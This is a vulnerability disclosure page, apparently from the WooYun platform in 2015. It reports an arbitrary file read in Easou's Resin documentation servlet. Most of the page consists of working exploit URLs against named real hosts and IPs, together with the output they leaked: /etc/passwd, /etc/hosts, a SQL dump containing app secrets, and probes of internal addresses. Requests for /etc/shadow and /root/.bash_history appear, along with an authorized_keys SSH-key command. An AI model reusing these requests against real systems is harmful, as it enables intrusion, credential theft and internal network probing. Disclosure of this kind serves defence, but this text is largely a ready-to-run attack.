宜搜科技多数重要系统任意文件读取(唤起厂商确认漏洞的良知)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154344

漏洞标题：宜搜科技多数重要系统任意文件读取(唤起厂商确认漏洞的良知)

漏洞作者： _Thorns

提交时间：2015-11-19 18:56

修复时间：2015-11-25 09:00

公开时间：2015-11-25 09:00

漏洞类型：应用配置错误

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-19：细节已通知厂商并且等待厂商处理中
2015-11-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

宜搜科技多数重要系统任意文件读取

详细说明：

1、Easou Monitor System
http://123.59.1.112/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1		localhost.localdomain localhost
::1		localhost6.localdomain6 localhost6
#118.144.87.27 bjbgpserver92_34.easou.com bjbgpserver92_34
118.144.87.27 bjbgpserver87_27.easou.com bjbgpserver87_27

http://123.59.1.112/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
inputFile: /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
resin:x:501:501::/home/resin:/bin/bash
warren:x:502:502::/home/warren:/bin/bash
qinhua:x:503:503::/home/qinhua:/bin/bash
kavin:x:509:509::/home/kavin:/bin/bash
steven:x:510:510::/home/steven:/bin/bash
bink:x:511:511::/home/bink:/bin/bash
sailing:x:512:512::/home/sailing:/bin/bash
cntv:x:0:0::/home/cntv:/bin/bash
back to demo
2、http://sso.easou.com/
http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow
http://120.197.95.198/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp
http://120.197.95.198/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
http://120.197.95.241/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history

http://sso.easou.com//db/2.6.0.sql

-- ----------------------------
-- Table structure for PAY_GAME
-- ----------------------------
CREATE TABLE "EAUSER"."PAY_GAME" (
  "APP_ID" NUMBER NOT NULL,
  "NAME" VARCHAR2(255 BYTE) NOT NULL,
  "PARTNER_ID" NUMBER NOT NULL,
  constraint PK_APP_ID PRIMARY KEY ("APP_ID")
);
-- ----------------------------
-- Records of PAY_GAME
-- ----------------------------
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('100', '宜搜E币充值', '1000100010001006');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('101', '宜搜书城-网页版', '1000100010001010');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1328', '宜搜斗地主', '1000100010001003');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1330', '小鸟OL', '1000100010001007');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1331', '三国时代', '1000100010001017');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1341', '启航斗地主', '1000100010001008');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1357', 'Q将水浒', '1000100010001009');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1368', '上古封神', '1000100010001011');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1369', '达人德州扑克', '1000100010001013');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1375', '霸气三国', '1000100010001020');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1377', '博雅德州扑克', '1000100010001014');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1379', 'Q卡三国', '1000100010001012');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1394', '末日大冒险', '1000100010001016');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1395', '幻想三国卡牌版', '1000100010001018');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1400', '三国制霸', '1000100010001019');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1401', '天珠', '1000100010001021');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1647', '凡人修仙传', '1000100010001024');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1649', '仙旅奇缘', '1000100010001027');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1685', '三国合伙人', '1000100010001028');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1686', '将星录', '1000100010001026');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1687', '三国合伙人IOS', '1000100010001029');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('9001', '宜搜游戏内部测试账号1', '1000100020000001');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('9002', '宜搜游戏内部测试账号2', '1000100020000002');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1211060012', '三国杀', '1000100010001001');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1211060013', '抬杠', '1000100010001002');
-- 增加两个字段
ALTER TABLE "EAUSER"."EUC_APP" ADD (APP_ID NUMBER);
ALTER TABLE "EAUSER"."EUC_APP" ADD (PARTNER_ID NUMBER);
-- 转移partnerId数据
UPDATE "EAUSER"."EUC_APP" eapp SET eapp.PARTNER_ID = eapp.ID;
-- 替换新的ID字段
ALTER TABLE "EAUSER"."EUC_APP" DROP COLUMN ID;
ALTER TABLE "EAUSER"."EUC_APP" ADD (ID NUMBER);
-- 添加ID与AppId的值
UPDATE "EAUSER"."EUC_APP" eapp SET 
	ID = (SELECT RNUM FROM 
		(
			SELECT PARTNER_ID,ROWNUM AS RNUM 
				FROM (SELECT PARTNER_ID FROM "EAUSER"."EUC_APP" ORDER BY CREATE_TIME ASC)
		) 
	eapp2  WHERE eapp2.PARTNER_ID = eapp.PARTNER_ID),
	APP_ID = (SELECT pgame.APP_ID FROM "EAUSER"."PAY_GAME" pgame WHERE pgame.PARTNER_ID = eapp.PARTNER_ID);
-- 设置ID为主键
ALTER TABLE "EAUSER"."EUC_APP" ADD CONSTRAINT PK_ID PRIMARY KEY(ID);
-- 斗你妹
UPDATE "EAUSER"."EUC_APP" SET PARTNER_ID = '1000100010001010' WHERE SECERT = 'E502886D2A3164BB267763734A2C3C20';
-- 老的Android三国
UPDATE "EAUSER"."EUC_APP" SET "NAME" = 'Newtab_old',APP_ID = NULL,"PARTNER_ID" = '1000100010001010' 
		WHERE SECERT = '44F3411D4C4A490F91D2D16C893C5145';
-- IOS三国
UPDATE "EAUSER"."EUC_APP" SET "PARTNER_ID" = '1000100010001010' WHERE SECERT = 'A6102A5C05414A24A8D5F9D25A9A0F04';
-- Android三国
UPDATE "EAUSER"."EUC_APP" SET "NAME" = 'Newtab',APP_ID = '1685',"PARTNER_ID" = '1000100010001010' 
		WHERE SECERT = '8C97398507CCD24342C835D7AB09077D';
-- 删除临时数据表
DROP TABLE "EAUSER"."PAY_GAME";

http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.14.16.45:80
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.14.16.46:80
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.14.16.105:80
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.14.16.106:80
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.14.16.118:80
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.14.16.140:80
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.14.16.148:80
http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.14.16.150:80

还有这太服务器的key

sed -i '/95_251/d' /root/.ssh/authorized_keys
echo ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== root@szmlserver95_251.easou.com >> /root/.ssh/authorized_keys

漏洞证明：

1、Easou Monitor System
http://123.59.1.112/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1		localhost.localdomain localhost
::1		localhost6.localdomain6 localhost6
#118.144.87.27 bjbgpserver92_34.easou.com bjbgpserver92_34
118.144.87.27 bjbgpserver87_27.easou.com bjbgpserver87_27

http://sso.easou.com//db/2.6.0.sql

-- ----------------------------
-- Table structure for PAY_GAME
-- ----------------------------
CREATE TABLE "EAUSER"."PAY_GAME" (
  "APP_ID" NUMBER NOT NULL,
  "NAME" VARCHAR2(255 BYTE) NOT NULL,
  "PARTNER_ID" NUMBER NOT NULL,
  constraint PK_APP_ID PRIMARY KEY ("APP_ID")
);
-- ----------------------------
-- Records of PAY_GAME
-- ----------------------------
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('100', '宜搜E币充值', '1000100010001006');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('101', '宜搜书城-网页版', '1000100010001010');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1328', '宜搜斗地主', '1000100010001003');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1330', '小鸟OL', '1000100010001007');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1331', '三国时代', '1000100010001017');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1341', '启航斗地主', '1000100010001008');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1357', 'Q将水浒', '1000100010001009');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1368', '上古封神', '1000100010001011');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1369', '达人德州扑克', '1000100010001013');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1375', '霸气三国', '1000100010001020');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1377', '博雅德州扑克', '1000100010001014');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1379', 'Q卡三国', '1000100010001012');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1394', '末日大冒险', '1000100010001016');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1395', '幻想三国卡牌版', '1000100010001018');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1400', '三国制霸', '1000100010001019');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1401', '天珠', '1000100010001021');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1647', '凡人修仙传', '1000100010001024');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1649', '仙旅奇缘', '1000100010001027');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1685', '三国合伙人', '1000100010001028');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1686', '将星录', '1000100010001026');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1687', '三国合伙人IOS', '1000100010001029');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('9001', '宜搜游戏内部测试账号1', '1000100020000001');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('9002', '宜搜游戏内部测试账号2', '1000100020000002');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1211060012', '三国杀', '1000100010001001');
INSERT INTO "EAUSER"."PAY_GAME" VALUES ('1211060013', '抬杠', '1000100010001002');
-- 增加两个字段
ALTER TABLE "EAUSER"."EUC_APP" ADD (APP_ID NUMBER);
ALTER TABLE "EAUSER"."EUC_APP" ADD (PARTNER_ID NUMBER);
-- 转移partnerId数据
UPDATE "EAUSER"."EUC_APP" eapp SET eapp.PARTNER_ID = eapp.ID;
-- 替换新的ID字段
ALTER TABLE "EAUSER"."EUC_APP" DROP COLUMN ID;
ALTER TABLE "EAUSER"."EUC_APP" ADD (ID NUMBER);
-- 添加ID与AppId的值
UPDATE "EAUSER"."EUC_APP" eapp SET 
	ID = (SELECT RNUM FROM 
		(
			SELECT PARTNER_ID,ROWNUM AS RNUM 
				FROM (SELECT PARTNER_ID FROM "EAUSER"."EUC_APP" ORDER BY CREATE_TIME ASC)
		) 
	eapp2  WHERE eapp2.PARTNER_ID = eapp.PARTNER_ID),
	APP_ID = (SELECT pgame.APP_ID FROM "EAUSER"."PAY_GAME" pgame WHERE pgame.PARTNER_ID = eapp.PARTNER_ID);
-- 设置ID为主键
ALTER TABLE "EAUSER"."EUC_APP" ADD CONSTRAINT PK_ID PRIMARY KEY(ID);
-- 斗你妹
UPDATE "EAUSER"."EUC_APP" SET PARTNER_ID = '1000100010001010' WHERE SECERT = 'E502886D2A3164BB267763734A2C3C20';
-- 老的Android三国
UPDATE "EAUSER"."EUC_APP" SET "NAME" = 'Newtab_old',APP_ID = NULL,"PARTNER_ID" = '1000100010001010' 
		WHERE SECERT = '44F3411D4C4A490F91D2D16C893C5145';
-- IOS三国
UPDATE "EAUSER"."EUC_APP" SET "PARTNER_ID" = '1000100010001010' WHERE SECERT = 'A6102A5C05414A24A8D5F9D25A9A0F04';
-- Android三国
UPDATE "EAUSER"."EUC_APP" SET "NAME" = 'Newtab',APP_ID = '1685',"PARTNER_ID" = '1000100010001010' 
		WHERE SECERT = '8C97398507CCD24342C835D7AB09077D';
-- 删除临时数据表
DROP TABLE "EAUSER"."PAY_GAME";

还有这太服务器的key

sed -i '/95_251/d' /root/.ssh/authorized_keys
echo ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== root@szmlserver95_251.easou.com >> /root/.ssh/authorized_keys

修复方案：

版权声明：转载请注明来源 _Thorns@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-11-25 09:00

厂商回复：

漏洞Rank：13 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154344

漏洞标题：宜搜科技多数重要系统任意文件读取(唤起厂商确认漏洞的良知)

相关厂商：easou.com

漏洞作者： _Thorns

提交时间：2015-11-19 18:56

修复时间：2015-11-25 09:00

公开时间：2015-11-25 09:00

漏洞类型：应用配置错误

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 _Thorns@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154344

漏洞标题：宜搜科技多数重要系统任意文件读取(唤起厂商确认漏洞的良知)

相关厂商：easou.com

漏洞作者： _Thorns

提交时间：2015-11-19 18:56

修复时间：2015-11-25 09:00

公开时间：2015-11-25 09:00

漏洞类型：应用配置错误

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154344"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 _Thorns@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：